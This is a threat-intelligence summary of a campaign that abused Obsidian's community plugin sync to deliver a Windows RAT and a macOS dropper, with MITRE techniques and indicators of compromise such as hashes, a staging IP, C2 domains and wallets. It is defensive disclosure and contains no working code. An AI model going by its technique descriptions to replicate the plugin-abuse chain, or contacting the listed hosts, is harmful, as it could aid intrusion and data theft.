Threat Research

Phantom in the vault: Obsidian abused to deliver PhantomPulse RAT

Elastic.co
Phantom in the vault: Obsidian abused to deliver PhantomPulse RAT
Elastic Security Labs tracked REF6598, a targeted social-engineering campaign that abused Obsidian’s community plugin sync to execute a cross-platform intrusion chain culminating in a novel Windows RAT named PHANTOMPULSE with blockchain-based C2 resolution. The campaign used LinkedIn/Telegram lures, trojanized Obsidian Shell Commands and Hider plugins for initial access, an in-memory loader called PHANTOMPULL on Windows, and an obfuscated AppleScript dropper with Telegram fallback on macOS. #PHANTOMPULSE #Obsidian

Keypoints

  • REF6598 used targeted social engineering on LinkedIn and Telegram to convince victims to log into an attacker-controlled Obsidian cloud vault and enable community plugin sync.
  • The initial access vector abused legitimate Obsidian community plugins (Shell Commands and Hider) to trigger silent command execution when a synced vault was opened.
  • Windows chain: Shell Commands triggered PowerShell that downloaded a staged loader (syncobs.exe/PHANTOMPULL) which decrypts and reflectively loads PHANTOMPULSE entirely in memory.
  • PHANTOMPULSE is a feature-rich, AI-assisted Windows RAT with advanced in-memory injection (module stomping), extensive telemetry, and a decentralized C2 resolution via on-chain Ethereum transaction data.
  • macOS chain: obfuscated AppleScript dropper persisted via a LaunchAgent and uses a layered C2 resolution (domains + Telegram dead-drop) with direct osascript execution of staged code.
  • Operators rotated C2 by encoding URLs into blockchain transaction calldata, but the design can be hijacked because the malware accepts the most-recent transaction for C2 without verifying sender authenticity.

MITRE Techniques

  • [T1566 ] Phishing – Social engineering over LinkedIn and Telegram was used to lure targets into opening the attacker-controlled Obsidian vault and enabling plugin sync (‘The threat actors operate under the guise of a venture capital firm, initiating contact with targets through LinkedIn…the conversation moves to a Telegram group’).
  • [T1059 ] Command and Scripting Interpreter – PowerShell and AppleScript were used to bootstrap and execute staged payloads on Windows and macOS (‘suspicious PowerShell execution with Obsidian as the parent process’; ‘the Shell commands plugin’s macOS command executes a Base64-encoded payload through osascript’).
  • [T1547 ] Boot or Logon Autostart Execution – macOS persistence was achieved by creating a LaunchAgent plist to run the second-stage dropper at login (‘Creates a persistent LaunchAgent plist at ~/Library/LaunchAgents/com.vfrfeufhtjpwgray.plist configured with KeepAlive and RunAtLoad set to true’).
  • [T1055 ] Process Injection – The Windows loader and RAT perform reflective in-memory loading and advanced injection techniques including module stomping to execute payloads without touching disk (‘reflectively loads payloads entirely in memory’ and ‘advanced process injection via module stomping’).
  • [T1071 ] Application Layer Protocol – PHANTOMPULSE communicates with C2 over HTTPS using WinHTTP and defined API endpoints for telemetry, tasking, uploads, and results (‘PHANTOMPULSE uses WinHTTP for C2 communication… /v1/telemetry/report POST’).
  • [T1548 ] Abuse Elevation Control Mechanism – The malware includes an escalation capability to SYSTEM via COM elevation moniker as a method for privilege escalation (‘Escalate to SYSTEM via COM elevation moniker’).
  • [T1056 ] Input Capture (Keylogging) – Keylogging capability and a C2 endpoint for keylog uploads are included in the RAT (‘v1/telemetry/keylog/POSTKeylog data upload’; ‘keylogStart/stop keylogger’).
  • [T1113 ] Screen Capture – The RAT can capture and upload screenshots to the C2 (‘screenshotCapture and upload a screenshot’; ‘v1/telemetry/upload/POSTScreenshot/file upload’).
  • [T1041 ] Exfiltration Over C2 Channel – Collected data (screenshots, keylogs, command results) is uploaded back to operator-controlled endpoints over the C2 channel (‘v1/telemetry/upload/POSTScreenshot/file upload’ and ‘/v1/telemetry/result POST Command result delivery’).
  • [T1199 ] Trusted Relationship – The adversary abused Obsidian’s legitimate plugin ecosystem and a signed Obsidian client to execute attacker-controlled commands via user-enabled plugin sync (‘abuses Obsidian’s legitimate community plugin ecosystem, specifically the Shell Commands and Hider plugins’).

Indicators of Compromise

  • [SHA-256 ] Staged loader and final payload – 70bbb38b70fd836d66e8166ec27be9aa8535b3876596fc80c45e3de4ce327980 (syncobs.exe / PHANTOMPULL), 33dacf9f854f636216e5062ca252df8e5bed652efd78b86512f5b868b11ee70f (PHANTOMPULSE)
  • [IPv4 address ] Payload staging server – 195.3.222[.]251 (PowerShell script and loader delivery)
  • [domain-name ] C2 and drop domains – panel.fefea22134[.]net (PhantomPulse C2 panel), 0x666[.]info (macOS dropper C2)
  • [URL ] macOS Telegram fallback – t[.]me/ax03bot (Telegram channel used as a fallback dead-drop for C2)
  • [crypto-wallet ] Blockchain C2 resolution wallet – 0xc117688c530b660e15085bF3A2B664117d8672aA (wallet used to encode C2 in transaction input); 0x38796B8479fDAE0A72e5E7e326c87a637D0Cbc0E (funding wallet)
  • [file name ] Observed file artifacts and script names – syncobs.exe (PHANTOMPULL loader), env:TEMPtt.ps1 (downloaded PowerShell stage), and .obsidian/plugins/obsidian-shellcommands/data.json (malicious Shell Commands configuration)

Read more: https://www.elastic.co/security-labs/phantom-in-the-vault